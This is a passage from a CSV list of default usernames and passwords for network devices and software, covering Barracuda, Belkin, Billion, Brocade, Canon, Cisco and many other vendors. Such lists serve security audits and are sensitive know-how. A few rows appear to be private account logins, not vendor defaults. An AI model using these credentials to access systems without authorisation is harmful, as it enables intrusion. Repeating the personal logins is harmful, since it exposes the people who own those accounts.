300,,http://lt;deviceIPgt;:8000,admin,admin,full admin access,,\nbarracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://:8080,admin,adminbn99,full admin access,,\nbarracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://:8080,guest,bnadmin99,guest access - some information disclosure,,\nbarracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://lt;deviceIPgt;:8080,admin,adminbn99,full admin access,,\nbarracudanetworks,Barracuda Spam Firewall,3.3.01.001 to 3.3.03.053,http://lt;deviceIPgt;:8080,guest,bnadmin99,guest access - some information disclosure,,\nbarracudanetworks,Barracuda Spyware Firewall,,http://:8000,admin,admin,full admin access,,\nbarracudanetworks,Barracuda Spyware Firewall,,http://lt;deviceIPgt;:8000,admin,admin,full admin access,,\nbauschdatacom,Proxima PRI ADSL PSTN Router4 Wireless,,Multi,admin,epicrouter,Admin,,\nbay networks,Router,,,Manager,,,,\nbay networks,Router,,,User,,,,\nbay networks,Router,,Admin,Manager,,,,\nbay networks,Router,,User,User,,,,\nbay networks,SuperStack II,,,security,security,,,\nbay networks,SuperStack II,,Admin,security,security,,,\nbay networks,Switch,,350T,,NetICs,,,\nbay networks,Switch,,Admin,,NetICs,,,\nbaynetworks,ASN / ARN Routers,,,Manager,Manager,,Any,\nbaynetworks,Accelar 1xxx switches,,,rwa,rwa,,Any,\nbaynetworks,Remote Annex 2000,,,admin,IP address,,Any,\nbaynetworks,Router,,,User,,User,,\nbaynetworks,Router,,Telnet,Manager,,Admin,,\nbaynetworks,Router,,Telnet,User,,User,,\nbaynetworks,SuperStack II,,,security,security,Admin,,\nbaynetworks,SuperStack II,,Telnet,security,security,Admin,,\nbaynetworks,Switch,350T,,,NetICs,Admin,,\nbaynetworks,Switch,350T,Telnet,,NetICs,Admin,,\nbea,WebLogic Process Integrator,,2.0,admin,security,,,\nbea,WebLogic Process Integrator,,2.0,joe,password,,,\nbea,WebLogic Process Integrator,,2.0,mary,password,,,\nbea,WebLogic Process Integrator,,2.0,system,security,,,\nbea,WebLogic Process Integrator,,2.0,wlcsystem,wlcsystem,,,\nbea,WebLogic Process Integrator,,2.0,wlpisystem,wlpisystem,,,\nbea,WebLogic,,,system,weblogic,,,\nbea,WebLogic,,Admin,system,weblogic,,,\nbea,WebLogic,,https,system,weblogic,Admin,,\nbea,WebLogic,9.0 beta (Diablo),,weblogic,weblogic,,,\nbea,Weblogic Process Integrator,2,,admin,security,,,\nbea,Weblogic Process Integrator,2,,joe,password,,,\nbea,Weblogic Process Integrator,2,,mary,password,,,\nbea,Weblogic Process Integrator,2,,system,security,,,\nbea,Weblogic Process Integrator,2,,wlcsystem,wlcsystem,,,\nbea,Weblogic Process Integrator,2,,wlpisystem,wlpisystem,,,\nbea,Weblogic Process Integrator,2.0,,admin,security,,,\nbea,Weblogic Process Integrator,2.0,,joe,password,,,\nbea,Weblogic Process Integrator,2.0,,mary,password,,,\nbea,Weblogic Process Integrator,2.0,,system,security,,,\nbea,Weblogic Process Integrator,2.0,,wlcsystem,wlcsystem,,,\nbea,Weblogic Process Integrator,2.0,,wlpisystem,wlpisystem,,,\nbea,Weblogic,,,system,weblogic,,5.1,\nbecu,accpints summary,,,musi1921,Musii%1921,,,\nbeetal,220x ADSL router,any,http://192.168.1.1,admin,password,admin,should be same for all routers,\nbelkin,,,192.168.2.1,,,guest,,\nbelkin,Belkin_N+_61F980,,Password,Belkin_N+_61F980,,,,\nbelkin,F1PG200ENau,,,,admin,,,\nbelkin,F1PG200ENau,,10.1.1.1,,admin,Admin,,\nbelkin,F1PG210ENau,,10.1.1.1,,admin,Admin,,\nbelkin,F1PI241EGau,,10.1.1.1,,admin,Admin,,\nbelkin,F1PI241ENau,,10.1.1.1,,admin,Admin,,\nbelkin,F1PI242EGau,,10.1.1.1,,admin,Admin,,\nbelkin,F5D5231-4,,http://192.168.2.1,,,Administration,,\nbelkin,F5D5630au4,,10.1.1.1,,admin,Admin,,\nbelkin,F5D5730au,,10.0.0.1 or 10.1.1.1,admin,password,Admin,,\nbelkin,F5D6130,,,,MiniAP,,,\nbelkin,F5D6130,,Admin,,MiniAP,,,\nbelkin,F5D6130,,SNMP,,MiniAP,Admin,Wireless Acess Point IEEE802.11b,\nbelkin,F5D6231-4 Router,,,,,,,\nbelkin,F5D6231-4,,V1.0 - 2.0,,,,,\nbelkin,F5D7150,FB,Multi,,admin,Admin,,\nbelkin,F5D7230-4 Router,,,,,,,\nbelkin,F5D7230-4,,192.168.2.1 or 192.168.2.254,Administrator,,Admin,,\nbelkin,F5D7231-4,,http://192.168.2.1,,,Administration,,\nbelkin,F5D7234 4V1,1002,,insight_wifi_1902,lgibson5405,,,\nbelkin,F5D7630au4,,192.168.2.1,,,Admin,,\nbelkin,F5D7633-4,,192.168.2.1,,,Admin,,\nbelkin,F5D7633au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D7634au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D8230-4,,192.168.2.1,,,Admin,,\nbelkin,F5D8230-4,,http://192.168.2.1,,,Administration,,\nbelkin,F5D8231au4,,192.168.0.2,,,Admin,,\nbelkin,F5D8232-4,,192.168.2.1,,,Admin,,\nbelkin,F5D8236-4 V3,V3,192.168.0.1,,NONE,ADMIN,,\nbelkin,F5D8236au4,,192.168.2.1,admin,,Admin,,\nbelkin,F5D8632au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D8633au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D8635au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D8636au4A,,192.168.2.1,,,Admin,,\nbelkin,F5D9230-4,,192.168.2.1,admin,admin,,,\nbelkin,F5D9230-4,,http://192.168.2.1,user:,,Administration,,\nbelkin,F5U025 USB Flash drive,,,,1111,,,\nbelkin,F6D4630au4A,,192.168.2.1,,(no default - user required to choose a password on setup),,,\nbelkin,F7D1301 v1,10011zb,192.168.2.1,belkin.3ebc,d4bba6ec,root,,\nbelkin,F7D2401au,,192.168.2.1,,,Admin,,\nbelkin,F8T030 Bluetooth AP,,,guest,guest,,Bluetooth passkey: belkin,\nbelkin,N300 Wireless N Router,all versions,192.168.2.1,belkin.f5c,,admin,,\nbelkin,P74476au,,http://10.0.0.2,admin,password,,,\nbelkin,PRO 3 KVM switch,,Console,admin,belkin,Admin,,\nbelkin,Wireless ADSL Modem/Router,,Full,admin,,,,\nbelkin,Wireless ADSL Modem/Router,,Multi,admin,,Full,,\nbelkin,f5d9230-4,,192.168.2.1,admin,admin,,,\nbenq,awl 700 wireless router,1.3.6 Beta-002,Multi,admin,admin,Admin,,\nbestpractical,RT,,,root,password,,,\nbestpractical,RT,,HTTP,root,password,Admin,,\nbestpracticalsolutions,Request Tracker,,,root,password,,,\nbetabrite,1026,,,,LLLLLL,Sign programming,Reset sign password,\nbetabrite,1036,,,,LLLLLL,Sign programming,Reset sign password,\nbetabrite,1040,,,,LLLLLL,Sign programming,Reset sign password,\nbetabrite,Prism 1196,,,,LLLLLL,Sign programming,Reset sign password,\nbetabrite,Prism full-colour LED sign,,,,,Sign programming,The sign has no password by default but if it does you can reset it by entering LLLLLL then a new password at the password prompt. Password is always 6 characters.,\nbewan,Wireless Routers,,,bewan,bewan,Admin,,\nbillion,5100W,,192.168.1.254,admin,admin,Admin,,\nbillion,5102S,,192.168.1.254,admin,admin,Admin,,\nbillion,5200,,192.168.1.254,admin,admin,Admin,,\nbillion,5200G,,192.168.1.254,admin,admin,Admin,,\nbillion,5200N,,192.168.1.254,admin,admin,Admin,,\nbillion,5200SRD,,192.168.1.254,admin,admin,Admin,,\nbillion,5210S,,192.168.1.254,admin,admin,Admin,,\nbillion,6200NXL,,192.168.1.254,admin,admin,Admin,,\nbillion,6404VGP,,192.168.1.254,admin,admin,Admin,,\nbillion,6404VP,,192.168.1.254,admin,admin,Admin,,\nbillion,6500,,192.168.1.254,admin,,Admin,,\nbillion,7000,,10.0.0.2,admin,epicrouter,Admin,,\nbillion,7100G,,192.168.1.254,admin,admin,Admin,,\nbillion,7100Pro,,192.168.1.254,admin,password,Admin,,\nbillion,7100S,,192.168.1.254,admin,admin,Admin,,\nbillion,711CE,,192.168.1.254,admin,password,Admin,,\nbillion,7202,,192.168.1.254,admin,admin,Admin,,\nbillion,7202G,,192.168.1.254,admin,admin,Admin,,\nbillion,7300,,192.168.1.254,admin,admin,Admin,,\nbillion,7300G,,192.168.1.254,admin,admin,Admin,,\nbillion,7300GRA,,192.168.1.254,admin,admin,Admin,,\nbillion,7300GX,,192.168.1.254,admin,admin,Admin,,\nbillion,7300N,,192.168.1.254,admin,admin,Admin,,\nbillion,7300RA,,192.168.1.254,admin,admin,Admin,,\nbillion,7301VGP,,192.168.1.254,admin,admin,Admin,,\nbillion,7400,,192.168.1.254,admin,admin,Admin,,\nbillion,7401VGP,,192.168.1.254,admin,admin,Admin,,\nbillion,7401VGP-M,,192.168.1.254,admin,admin,Admin,,\nbillion,7404VGPX,,192.168.1.254,admin,admin,Admin,,\nbillion,7404VNOX,,192.168.1.254,admin,admin,Admin,,\nbillion,7404VNPX,,192.168.1.254,admin,admin,Admin,,\nbillion,741GE,,192.168.1.254,admin,admin,Admin,,\nbillion,741GE,USB,192.168.1.254,admin,admin,Admin,,\nbillion,743GE,,192.168.1.254,admin,admin,Admin,,\nbillion,7500G,,192.168.1.254,admin,admin,Admin,,\nbillion,7700N,,192.168.1.254,admin,admin,Admin,,\nbillion,7700NR2,,192.168.1.254,admin,admin,Admin,,\nbillion,7800GZ,,192.168.1.254,admin,admin,Admin,,\nbillion,7800N,,192.168.1.254,admin,admin,Admin,,\nbillion,BiGuard 30,,192.168.1.254,admin,admin,Admin,,\nbillion,BiGuard 50G,,,admin,admin,Admin,,\nbillion,BiGuard S20,,192.168.1.254,admin,admin,Admin,,\nbillion,BiGuard S6000,,192.168.1.254,admin,admin,Admin,,\nbillion,BiGuard,,,admin,admin,,,\nbillion,BiPAC 5100,,192.168.1.254,admin,admin,Admin,,\nbillion,BiPAC 5100,,HTTP,admin,admin,Admin,,\nbillion,BiPAC 5102,,http://192.168.1.254,admin,admin,Administration,,\nbillion,BiPAC 640 AC,640AE100,HTTP,,,Admin,,\nbillion,BiPAC 6600,,http://192.168.1.254,,,Administration,,\nbillion,BiPAC 7202G,,http://192.168.1.254,admin,admin,Administration,,\nbillion,BiPAC 7402VGP,,http://192.168.1.254,admin,admin,Administration,,\nbillion,MyGuard 7500GL,,192.168.1.254,admin,admin,Admin,,\nbintec,Bianca/Brick,,XM-5.1,,snmp-Trap,,,\nbintec,Bianca/Brick,,read/write,,snmp-Trap,,,\nbintec,Bianca/Brick,XM-5.1,SNMP,,snmp-Trap,read/write,,\nbintec,Bianka \t,,admin bintec,Admin,No,,,\nbintec,Bianka Routers,,,admin,bintec,,,\nbintec,Bianka Routers,,Admin,admin,bintec,,,\nbintec,Bianka Routers,,Multi,admin,bintec,Admin,,\nbintec,all Routers,,,admin,bintec,,Any,\nbintec,x1200,37834,Multi,admin,bintec,Admin,,\nbintec,x2300i,37834,Multi,admin,bintec,Admin,,\nbintec,x3200,37834,Multi,admin,bintec,Admin,,\nbiodata,BIGfire,,,,Babylon,,,\nbiodata,Babylon,,,,Babylon,,,\nbiodata,Bigfire +,,Admin,config,biodata,,,\nbiodata,Bigfire +,,Multi,config,biodata,Admin,,\nbiostar,PC BIOS,,,,Biostar,,,\nbiostar,PC BIOS,,Admin,,Biostar,,,\nbiostar,PC BIOS,,Admin,,Q54arwms,,,\nbiostar,PC BIOS,,Console,,Biostar,Admin,,\nbiostar,PC BIOS,,Console,,Q54arwms,Admin,,\nbiscom,Biscom Delivery Server (BDS),,,admin,admin,,,\nbizdesign,ImageFoliio,,2.2,Admin,ImageFolio,,,\nbizdesign,ImageFolio Pro,,2.2,Admin,ImageFolio,,,\nbizdesign,ImageFolio Pro,2.2,HTTP,Admin,ImageFolio,Admin,default admin page is:/cgi-bidmidmin.cgi,\nbizdesign,ImageFolio,2.2,HTTP,Admin,ImageFolio,Admin,,\nblackberry,Pearl,,,,,Password Keeper,By default has no password,\nblackberry,Pearl,,,Password Keeper,By default has no password,\nblackbox,BLACK BOX ServSensor JR,,,Administrator,public,,,\nblackbox,BLACK BOX ServSensor JR,v2.0,HTTP,Administrator,public,,,\nblackwidowwebdesignltd,Saxon,5.4,http,admin,nimda,Admin,,\nblitzztechnologies,BWA711,,,admin,admin,,,\nbluecoatsystems,ProxySG,3.x,HTTP,admin,articon,Admin,access to command line interface via ssh and web gui,\nbmc software,Patrol,,Admin,Administrator,the same all over,,,\nbmc software,Patrol,,all,Administrator,the same all over,,,\nbmc,Patrol,,6,patrol,patrol,,,\nbmc,Patrol,,User,patrol,patrol,,,\nbmc,Patrol,6,Multi,patrol,patrol,User,,\nbmc,Patrol,6.0,Multi,patrol,patrol,User,,\nbmc,Patrol,all,BMC unique,Administrator,the same all over,Admin,this default user normally for ALL system in this area with one Password,\nbmc,Software Performance Assurance for Microsoft Servers,,,Best1_User,BackupU$r,,,\nborland,Interbase,,,,,,,\nborland,Interbase,,,,,,Any,\nborland,Interbase,,,SYSDBA,masterkey,,any,\nborland,Interbase,,,politcally,correct,,Any,\nborland,Interbase,,,politically,correct,,,\nborri,CS131,all versions,http,admin,UpsMon,,,\nboson,router simulator,,Admin,,,,,\nboson,router simulator,3.66,Multi,,,Admin,,\nbreezecom,Breezecom Adapters,,2.x,,laflaf,,,\nbreezecom,Breezecom Adapters,,3.x,,Master,,,\nbreezecom,Breezecom Adapters,,4.4.x,,Helpdesk,,,\nbreezecom,Breezecom Adapters,,4.x,,Super,,,\nbreezecom,Breezecom Adapters,,Admin,,Master,,,\nbreezecom,Breezecom Adapters,,Admin,,Super,,,\nbreezecom,Breezecom Adapters,,Admin,,laflaf,,,\nbreezecom,Breezecom Adapters,2.x,,,laflaf,,,\nbreezecom,Breezecom Adapters,2.x,,,laflaf,Admin,,\nbreezecom,Breezecom Adapters,3.x,,,Master,,,\nbreezecom,Breezecom Adapters,3.x,,,Master,Admin,,\nbreezecom,Breezecom Adapters,4.4.x,Console,,Helpdesk,Admin,,\nbreezecom,Breezecom Adapters,4.x,,,Super,,,\nbreezecom,Breezecom Adapters,4.x,,,Super,Admin,,\nbreezecom,SA10,,,,,,,\nbroadlogic,XLT router,,HTTP,webadmin,webadmin,Admin,,\nbroadlogic,XLT router,,Telnet,admin,admin,Admin,,\nbroadlogic,XLT router,,Telnet,installer,installer,Admin,,\nbroadmax,LinkMax HSA300A-2,,http://192.168.0.1,broadmax,broadmax,Admin,You need to put the IP as Gateway in TCPIP settings and 192.168.0.2 as your assigned IP.,\nbrocade,Fabric OS,,3.x,admin,password,,,\nbrocade,Fabric OS,,3.x,root,fivranne,,,\nbrocade,Fabric OS,,All,root,fivranne,,,\nbrocade,Fabric OS,,Multi,admin,password,Admin,Gigabit SAN,\nbrocade,Fabric OS,All,Multi,root,fibranne,Admin,,\nbrocade,Fabric OS,All,Multi,root,fivranne,Admin,Gigiabit SAN (),\nbrocade,Silkworm,all,Multi,admin,password,Admin,Also on other Fiberchannel switches,\nbrother,HL-1270n,,,,access,,,\nbrother,HL-1270n,,Multi,,access,network board access,,\nbrother,HL-1270n,,network board access,,access,,,\nbrother,HL-3040CN,,,admin,access,,,\nbrother,HL-5370DW,Firmware 1.18 Network Firmware 1.03,Web interface,admin,access,allows network configuration,,\nbrother,MFC Network-capable printers,all versions,http,admin,access,,,\nbrother,MFC-8860DB,,,admin,access,,,\nbrother,NC-3100h,,,,access,,,\nbrother,NC-3100h,,,,access,network board access,,\nbrother,NC-3100h,,network board access,,access,,,\nbrother,NC-4100h,,,,access,,,\nbrother,NC-4100h,,,,access,network board access,,\nbrother,NC-4100h,,network board access,,access,,,\nbrother,QL-580N,,,admin,access,,,\nbrother,ql580N,,,admin,access,,,\nbt,HomeHub,,192.168.1.254,admin,admin,Admin,,\nbt,Voyager 2000,,,admin,admin,,,\nbt,Voyager 2000,,,admin,admin,Admin,,\nbt,Voyager 240,,,admin,admin,Admin,,\nbuffalo,AirStation WLA-L11,,,root,,,Root acct cannot be changed, no password by default,\nbuffalo,AirStation WLA-L11,,,root,,,Root acct cannot be changed,no password by default\nbuffalo,BBR-4MG and BBR-4HG,ALL,HTTP,root,,Admin,,\nbuffalo,WBMR-G300N,,192.158.11.1 or 192.168.1.251,root,,Admin,,\nbuffalo,WHR-HP-G54,,192.158.11.1 or 192.168.11.100,root,,Admin,,\nbuffalo,WHR3-G54 Router,,,root,,,,\nbuffalo,WZR-HP-G300NH,,192.158.11.1 or 192.168.1.100,root,,Admin,,\nbuffalo,Wireless Broadband Base Station-g ,WLA-G54 WBR-G54,HTTP,root,,Admin,http://192.168.11.1,\nbuffalo,Wireless Broadband Base Station-g,,WLA-G54 WBR-G54,root,,,,\nbuffalo,Wireless Broadband Base Station-g,WLA-G54 WBR-G54,HTTP,root,,Admin,http://192.168.11.1,\nbuffalo/melco,AirStation,,,root,,,,\ncableandwireless,ADSL Modem/Router,,Multi,admin,1234,Admin,,\ncabletron,Netgear modem/router and SSR,,,netman,,,,\ncabletron,Netgear modem/router and SSR,,,netman,,Admin,,\ncabletron,Netgear modem/router and SSR,,Admin,netman,,,,\ncabletron,routers switches,,,,,,,\ncabletron,routers & switches,,,,,,,\ncabletron,routers &,,,,,,,\ncalldirect,CDM 882seu,All,192.168.1.50,admin,password,Admin,,\ncalldirect,CDR-780seu,All,192.168.1.50,admin,password,Admin,,\ncanon,2525i,,,7654321,7654321,,,\ncanon,2535i,,,7654321,7654321,,,\ncanon,IR 1025,,IP,,,Administrator,Administrator access does not need a password,\ncanon,MB5360,all versions,http,ADMIN,canon,Admin,,\ncanon,iFP650,all versions,http,,,admin,,\ncanon,iR-ADV C2020L,,https,7654321,7654321,Device Info,Supply Levels,Jobs Print Status\ncanon,iR-ADV C5035,,http,7654321,7654321,Admin,,\ncanon,iR1023,,Administrator,,0000,,,\ncanyon,router,,Multi,Administrator,admin,Admin,,\ncapricorninfotechindia,eToken Pro,,,,1234567890,,,\ncarestream,Health Spectrum,,,KeyOperator,DV5800,,,\ncarestream,Health Spectrum,,,LocalService,DV5800,,,\ncarstenschmitz,LimeSurvey,,,admin,password,,,\ncastlenet,,,http,MSO,changeme,ROOT,,\ncayman,3200,,,admin,admin,2015-06-21,,\ncayman,3220-H DSL Router,,,Any,,,GatorSurf 5.,\ncayman,Cayman DSL,,,,,,,\ncayman,Cayman DSL,,,,,Admin,,\ncayman,Cayman DSL,,3220-H,},,,,\ncayman,Cayman DSL,,Admin,,,,,\ncayman,Cayman DSL,,Admin,},,,,\ncayman,Cayman DSL,3220-H,,},,Admin,,\ncayman,Cayman DSL,SBC/Pacbell,,admin,(device serial number),Admin,,\ncayman,DSL Router,,,admin,(serial number),,,\ncelerity,Mediator,,,root,Mau,,,\ncelerity,Mediator,,Admin,root,Mau dib,,,\ncelerity,Mediator,,Multi,mediator,mediator,,,\ncelerity,Mediator,,Multi,root,Mau'dib,Admin,Assumption: the password is Mua'dib,\ncelerity,Mediator,,User,mediator,mediator,,,\ncelerity,Mediator,Multi,Multi,mediator,mediator,User,,\ncellit,CCPro,,,cellit,cellit,,,\ncellit,CCPro,,Multi,cellit,cellit,Admin,,\nceragonnetworks,FibeAir,,,root,tooridu,,,\ncgi world,Poll It,,v2.0,,protection,,,\ncgiworld,Poll It,2,HTTP,,protection,User/Admin over package,http://server.com/ScriptName.cgi?load=login,\ncgiworld,Poll It,2.0,HTTP,,protection,User/Admin over package,http://server.com/ScriptName.cgi?load=login,\nchase research,Iolan,,,,iolan,,,\nchaseresearch,Iolan,,,,iolan,,,\ncheckpoint,,,,admin,qaz123,,,\ncheckpoint,Firewall-1,,Multi,admin,abc123,admin,,\ncheckpoint,Firewall-1,,admin,admin,abc123,,,\ncheckpoint,Interspect 210,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,Interspect 210N,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,Interspect 410,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,Interspect 610,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,Interspect 610S,,SSH/Con/Serial,admin,admin,Admin,,\ncheckpoint,SecurePlatform,,Admin,admin,admin,,,\ncheckpoint,SecurePlatform,,NG FP3,admin,admin,,,\ncheckpoint,SecurePlatform,NG FP3,Console,admin,admin,Admin,,\nchuming chen,NessusWeb,,,administrator,adminpass,,,\nchumingchen,NessusWeb,,HTTP,administrator,adminpass,Admin,,\nciphertrust,IronMail,Any,Multi,admin,password,Admin,,\ncisco,1100,,,,Cisco,Admin,,\ncisco,1200,,,Cisco,Cisco,Admin,,\ncisco,1300,,,Cisco,Cisco,Admin,,\ncisco,1400,,,,Cisco,Admin,,\ncisco,1801,,10.10.10.1,cisco,cisco,Admin,Fixed Configuration,\ncisco,1841,,10.10.10.1,cisco,cisco,Admin,Modular Configuration,\ncisco,2100 aka DPX2100,all versions (comcast-supplied),http://192.168.100.1,,W2402,,password case sensitive,\ncisco,2600,,Telnet,Administrator,admin,Admin,,\ncisco,2811,,,cisco,cisco,Admin,,\ncisco,857,,10.10.10.1,cisco,cisco,Admin,,\ncisco,857W,,192.168.1.1,,cisco,Admin,,\ncisco,877,,10.10.10.1,cisco,cisco,,,\ncisco,877W,,10.10.10.1,cisco,cisco,Admin,,\ncisco,887,,,cisco,cisco,Admin,,\ncisco,AIR-AP1231G-A-K9,,,Cisco,Cisco,,,\ncisco,AIR-AP1231G-A-K9,,,Cisco,Cisco,Admin,Default SSID is tsunami. Username/password are case sensitive.,\ncisco,AP1200,IOS,Multi,Cisco,Cisco,Admin,This is when you convert AP1200 or AP350 to IOS,\ncisco,ASA 5505,,,Cisco,Cisco,Admin,,\ncisco,ATA 186,,,admin,,Admin,,\ncisco,Aironet 1100,,webadmin,Cisco,Cisco,,,\ncisco,Aironet 1100,AP1120B-E-K9,HTTP,Cisco,Cisco,webadmin,,\ncisco,Aironet 1130AG,,,Cisco,Cisco,Admin,,\ncisco,Aironet 1200,,,Cisco,Cisco,,,\ncisco,Aironet 1200,,10.10.10.1,Cisco,Cisco,Admin,,\ncisco,Aironet 1200,,HTTP,root,Cisco,Admin,,\ncisco,Aironet 1200,,Multi,Cisco,Cisco,,,\ncisco,Aironet 1230AG,,,Cisco,Cisco,Admin,,\ncisco,Aironet 1350,,HTTP,admin,tsunami,webadmin,,\ncisco,Aironet 1350,,webadmin,admin,tsunami,,,\ncisco,Aironet,,Multi,,_Cisco,Admin,,\ncisco,Aironet,,Multi,Cisco,Cisco,Admin,,\ncisco,Any Router and Switch,,,cisco,cisco,,10 thru 12,\ncisco,Arrowpoint,,,admin,system,Admin,,\ncisco,BBSD MSDE Client,,5.0 and 5.1,bbsd-client,NULL,,,\ncisco,BBSD MSDE Client,,database,bbsd-client,NULL,,,\ncisco,BBSD MSDE Client,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,NULL,database,The BBSD Windows Client password will match the BBSD MSDE Client password,\ncisco,BBSM Administrator,,5.0 and 5.1,Administrator,changeme,,,\ncisco,BBSM Administrator,,Admin,Administrator,changeme,,,\ncisco,BBSM Administrator,5.0 and 5.1,Multi,Administrator,changeme,Admin,,\ncisco,BBSM MSDE Administrator,,5.0 and 5.1,sa,,,,\ncisco,BBSM MSDE Administrator,,Admin,sa,,,,\ncisco,BBSM MSDE Administrator,5.0 and 5.1,IP and Named Pipes,sa,,Admin,,\ncisco,BBSM,,5.0 and 5.1,bbsd-client,changeme2,,,\ncisco,BBSM,,database,bbsd-client,changeme2,,,\ncisco,BBSM,5.0 and 5.1,Telnet or Named Pipes,bbsd-client,changeme2,database,The BBSD Windows Client password will match the BBSD MSDE Client password,\ncisco,CNR,,Admin,admin,changeme,,,\ncisco,CNR,,All,admin,changeme,,,\ncisco,CNR,All,CNR GUI,admin,changeme,Admin,This is the default password for Cisco Network Registrar,\ncisco,Cache Engine,,,admin,diamond,,,\ncisco,Cache Engine,,Admin,admin,diamond,,,\ncisco,Cache Engine,,Console,admin,diamond,Admin,,\ncisco,Catalyst 4000/5000/6000,,All,,public/private/secret,,,\ncisco,Catalyst 4000/5000/6000,,RO/RW/RW+change SNMP config,,public/private/secret,,,\ncisco,Catalyst 4000/5000/6000,All,SNMP,,public/private/secret,RO/RW/RW+change SNMP config,default on All Cat switches running the native CatOS CLI software.,\ncisco,Catalyst Express 520,,,cisco,cisco,,,\ncisco,Cisco Broadband Troubleshooter,,,admin,changeme,,,\ncisco,Cisco Guard,,SNMP,,riverhead,,,\ncisco,Cisco IDS,,,root,attack,,,\ncisco,Cisco Works,,,admin,admin,,,\ncisco,CiscoWorks 2000,,,admin,cisco,,,\ncisco,CiscoWorks 2000,,,admin,cisco,Admin,,\ncisco,CiscoWorks 2000,,,guest,,,,\ncisco,CiscoWorks 2000,,,guest,,User,,\ncisco,CiscoWorks 2000,,Admin,admin,cisco,,,\ncisco,CiscoWorks 2000,,User,guest,,,,\ncisco,CiscoWorks,,Multi,admin,admin,,,\ncisco,Ciso Aironet 1100 series,Rev. 01,HTTP,,Cisco,Admin,,\ncisco,Codec,,,admin,,,,\ncisco,ConfigMaker Software,,,,cmaker,,any?,\ncisco,ConfigMaker,,,cmaker,cmaker,,,\ncisco,ConfigMaker,,,cmaker,cmaker,Admin,,\ncisco,ConfigMaker,,Admin,cmaker,cmaker,,,\ncisco,Content Engine,,Telnet,admin,default,Admin,,\ncisco,DPC3825,3.02,http://192.168.0.1,admin,W2402,Admin,,\ncisco,DPQ3212C,,192.168.100.1,,,Admin,,\ncisco,DPQ3925,,192.168.0.1,admin,password,Admin,,\ncisco,E3000,,192.168.1.1,admin,admin,admin,,\ncisco,EPC2425,1.0,http://192.168.0.1,,233897301,Admin,,\ncisco,EPC3925,,192.168.100.1 or 192.168.100.1,admin,password,Admin,,\ncisco,GSR,,Telnet,admin,admin,admin,,\ncisco,HSE,,Multi,hsa,hsadb,Admin,,\ncisco,HSE,,Multi,root,blender,Admin,,\ncisco,IDS (netranger),,,root,attack,,,\ncisco,IOS,,,,Cisco router,,,\ncisco,IOS,,,,c,,,\ncisco,IOS,,,,cc,,,\ncisco,IOS,,,,cisco,,,\ncisco,IOS,,,cisco,cisco,,,\ncisco,IOS,,,enable,cisco,,,\ncisco,IOS,,,private ReadWrite access,secret,,,\ncisco,IOS,,,public ReadOnly access,secret,,,\ncisco,IOS,,,ripeop,(no pw),,,\ncisco,IOS,,11.x-12.x,,ILMI,,,\ncisco,IOS,,12.1(3),,cable-docsis,,,\ncisco,IOS,,2600 series,,c,,,\ncisco,IOS,,Admin,,c,,,\ncisco,IOS,,Multi,,Cisco router,,,\ncisco,IOS,,Multi,,c,Admin,,\ncisco,IOS,,Multi,,cc,,,\ncisco,IOS,,Multi,,cisco,,,\ncisco,IOS,,Multi,cisco,cisco,,,\ncisco,IOS,,Multi,enable,cisco,,,\ncisco,IOS,,Multi,ripeop,,,,\ncisco,IOS,,SNMP read-write,,cable-docsis,,,\ncisco,IOS,,SNMP,private ReadWrite access,secret,Read/write,,\ncisco,IOS,,SNMP,public ReadOnly access,secret,Read,,\ncisco,IOS,,limited READ/WRITE,,ILMI,,,\ncisco,IOS,11.x-12.x,SNMP,,ILMI,limited READ/WRITE,,\ncisco,IOS,12.1(3),SNMP,,cable-docsis,SNMP read-write,,\ncisco,IOS,2600 Series,Multi,,c,Admin,,\ncisco,IP Conference Station,7936,HTTP,End User,7936,,,\ncisco,MGX,,,superuser,superuser,,*,\ncisco,Modeling Labs,,,uwmadmin,password,,,\ncisco,NA,,,prixadmin,prixadmin,,NA,\ncisco,N\\A,,,prixadmin,prixadmin,,N\\A,\ncisco,Net Ranger 2.2.1,,,root,attack,,Sol 5.6,\ncisco,Netranger/secure IDS,,,netrangr,attack,,,\ncisco,Netranger/secure IDS,,3.0(5)S17,root,attack,,,\ncisco,Netranger/secure IDS,,Admin,root,attack,,,\ncisco,Netranger/secure IDS,,Multi,netrangr,attack,,,\ncisco,Netranger/secure IDS,3.0(5)S17,Multi,root,attack,Admin,must be changed at the first connection,\ncisco,Network Registrar (CNR),,,admin,changeme,,,\ncisco,PIX 501,,192.168.1.1,cisco,cisco,Admin,,\ncisco,PIX firewall,,Telnet,,cisco,UID=pix,,\ncisco,PIX,,,,cisco,,,\ncisco,RV016,,http://192.168.1.1,admin,admin,Admin,,\ncisco,RV082,,http://192.168.1.1,admin,admin,Admin,,\ncisco,RVS4000,,http://192.168.1.1,admin,admin,Admin,,\ncisco,SG500 Series,,,cisco,cisco,Admin,,\ncisco,SPA-502G,,,,,Admin,,\ncisco,SPA-504G,,,,,Admin,,\ncisco,SPA-508G,,,,,Admin,,\ncisco,SPA-509G,,,,,Admin,,\ncisco,SRP521W-K9,,192.168.15.1,admin,telstra,Admin,,\ncisco,SRP527W-K9,,192.168.15.1,admin,cisco,Admin,,\ncisco,Traffic Anomaly 